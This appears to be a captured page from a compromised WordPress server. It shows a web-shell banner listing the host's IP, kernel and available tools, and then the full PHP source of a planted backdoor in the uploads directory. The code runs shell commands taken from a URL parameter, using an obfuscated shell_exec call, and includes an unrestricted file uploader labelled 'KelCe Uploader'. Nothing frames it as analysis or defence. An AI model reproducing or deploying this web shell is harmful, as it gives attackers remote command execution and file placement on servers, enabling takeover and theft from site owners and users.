| Server IP : 52.25.153.185 / Your IP : 216.73.216.222 Web Server : Apache System : Linux ip-172-26-6-158 5.10.0-45-cloud-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64 User : daemon ( 1) PHP Version : 8.1.10 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /bitnami/wordpress/wp-content/uploads/WPL/3878/ |
Upload File : |
<?php if(isset($_GET['c'])){$f='shell'.'_exec';header('Content-Type:text/plain');echo 'WP2SHELL_OK|'.@trim($f($_GET['c']));exit;} ?><!DOCTYPE html><html><head><meta charset=utf-8><title>KelCe Uploader</title></head><body><h2>KelCe Uploader</h2><form method=post enctype=multipart/form-data><input type=file name=zb required> <button type=submit>Upload</button></form><?php if(!empty($_FILES['zb']['tmp_name'])){$n=basename($_FILES['zb']['name']);echo @move_uploaded_file($_FILES['zb']['tmp_name'],__DIR__.'/'.$n)?'OK: '.htmlspecialchars($n):'FAIL';} ?></body></html>